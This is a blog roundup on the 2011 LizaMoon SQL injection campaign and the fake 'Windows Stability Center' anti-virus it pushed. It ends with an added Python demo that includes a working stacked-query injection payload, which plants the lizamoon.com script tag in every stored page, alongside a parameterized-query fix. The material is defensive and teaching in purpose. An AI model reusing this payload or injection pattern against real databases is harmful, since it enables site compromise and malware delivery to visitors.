By Richi Jennings
April 1, 2011. Updated: Literally millions of URLs have been infected with a rampant SQL injection attack. The LizaMoon Windows Stability Center fake anti-virus has even infected the iTunes Music Store... kinda-sorta. In IT Blogwatch, bloggers make like Chicken Licken.
Your humble blogwatcher curated these bloggy bits for your entertainment. Not to mention Angry Nerds: Best April Fools I've seen so far...
Websense's Patrik Runald claims to have spotted it first:
The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page:
<script src=hxxp://lizamoon.com/ur.php></script>
... This includes several iTunes URLs. ... The good thing is that iTunes encodes the script tags, which means that the script doesn't execute. ... Good job, Apple.
The Rogue AV software that is installed is called Windows Stability Center. ... [It] displays a warning that there are lots of problems on your PC. ... Very traditional rogue AV scam.
John Leyden is shocked. Shocked, I tell you:
The so-called LizaMoon mass-injection attack uses SQL injection trickery to inject a line of malicious code into compromised pages ... as part of an ambitious attack ... designed to redirect surfers to a site pimping rogue anti-virus packages.
[It] counts as among the most widespread mass-injection attacks on record.
Peter Bright explains:
SQL injection attacks ... exploit badly-written Web applications to directly perform actions against databases. ... The underlying cause is a programmer trusting [user] input ... and passing this input directly into the database. ... The database will run code of the attacker's choosing.
SQL injections following this pattern appear to have been happening ... for six or more months. ... The file name ur.php and the style of injection remain consistent. ... Previous efforts were on a much smaller scale, however. ... The attacks originated from IP addresses in eastern Europe and Russia.
It's nice to see Dancho Danchev back blogging:
What's particularly interesting about this campaign is ... that the used domains are all responding to the same IPs. ... 126.96.36.199 (AS3721); 188.8.131.52 (AS51786); 184.108.40.206 (AS50244).
The scareware domains have been registered using automatically registered email accounts at Gmail, as a precaution in an attempt to make it harder to expose the campaign by using a single email only.
But Chris Nerney grumbles about the date:
This really had better not be an April Fool's prank or I'm not going to be happy. ... It's the stupidest day of the year, so we should all be on guard.
Meanwhile, the enigmatic rfirth also waxes topical:
The bottom line for users ... is that if they visit one of the sites injected ... they get a scary warning about huge problems on their PC. Fortunately, all that goes away if the ... user pays for a full version of Windows Stability Center! So you've been warned.
Unfortunately, this isn't an April Fools day joke. It's real.
And Finally... Angry Nerds: Best April Fools I've seen so far
(add your favorites in the comments below)
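Editor's added illustration (not part of the original post, nor of any quoted blogger's writing): the input-trust bug Peter Bright describes, worked through in Python with the bundled sqlite3 module, using the ur.php script tag Patrik Runald quotes as the payload. The pages table and its body column, the title request parameter, and the stacked-UPDATE shape of the payload are assumptions made for this example, not the actual LizaMoon statements; executescript() stands in for a database driver that accepts several statements in one call, which sqlite3's execute() refuses but many SQL Server connections do not. The same lookup done with a bound parameter treats the payload as data, and html.escape() shows the output encoding Runald credits iTunes with: an injected tag is displayed as text instead of executing.

```python
import html
import sqlite3

# The tag Websense reported being injected into pages (defanged 'hxxp' kept
# as on the page). It contains no single quotes, so it sits inside a SQL
# string literal as-is.
INJECTED_TAG = "<script src=hxxp://lizamoon.com/ur.php></script>"

# Attacker-controlled value for a hypothetical 'title' request parameter
# (assumed for this example). It closes the application's open string
# literal, ends the SELECT, appends an UPDATE that concatenates the tag onto
# every stored page body (|| is SQLite's string concatenation; SQL Server
# uses +), and leaves a tautology to absorb the closing quote the
# application adds.
PAYLOAD = ("x'; UPDATE pages SET body = body || '" + INJECTED_TAG
           + "' WHERE '1' = '1")

# Constructed sample data for a hypothetical CMS table.
SEED_PAGES = [("home", "<p>Welcome</p>"), ("about", "<p>About us</p>")]


def make_db():
    """Build the hypothetical pages table in memory and seed it."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages (title, body) VALUES (?, ?)", SEED_PAGES)
    conn.commit()
    return conn


def bodies(conn):
    """Return every stored page body, in id order."""
    return [row[0] for row in conn.execute("SELECT body FROM pages ORDER BY id")]


def vulnerable_lookup(conn, title):
    """Bright's bug: the request value is spliced into the statement text.

    executescript() emulates a driver that runs stacked statements, so the
    attacker's UPDATE runs alongside the intended SELECT. Returns the page
    bodies afterwards so the damage is visible.
    """
    sql = "SELECT body FROM pages WHERE title = '" + title + "'"
    conn.executescript(sql)
    return bodies(conn)


def parameterized_lookup(conn, title):
    """The fix: the value travels as a bound parameter, never as SQL text.

    Returns (matching bodies, all bodies). The payload simply matches no
    title, and the table is left exactly as seeded.
    """
    rows = conn.execute(
        "SELECT body FROM pages WHERE title = ?", (title,)).fetchall()
    return [row[0] for row in rows], bodies(conn)


def render_escaped(body):
    """Output encoding, as Runald notes iTunes does: '<' and '>' become
    entities, so a stored tag is shown to the reader rather than run."""
    return html.escape(body, quote=True)


def demo():
    """Run both lookups against fresh copies of the table."""
    attacked = vulnerable_lookup(make_db(), PAYLOAD)
    matched, untouched = parameterized_lookup(make_db(), PAYLOAD)
    return attacked, matched, untouched


if __name__ == "__main__":
    attacked, matched, untouched = demo()
    print("vulnerable lookup left these bodies:", attacked)
    print("parameterized lookup matched:", matched, "bodies:", untouched)
    print("escaped for output:", render_escaped(attacked[0]))
```

Run it and the vulnerable path leaves the ur.php tag appended to every page body after a single request, while the parameterized path returns no rows and leaves the table as seeded. Escaping only protects the rendering side: it is what stopped the injected tag from running on iTunes pages, but it does not undo the database compromise, which is why the parameterized query is the fix and encoding is the backstop.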
You can also read Richi's full profile and disclosure of his industry affiliations.
Richi Jennings is an independent analyst/consultant, specializing in blogging, email, and security. A cross-functional IT geek since 1985, you can follow him as @richi on Twitter, pretend to be richij's friend on Facebook, or just use good old email: firstname.lastname@example.org.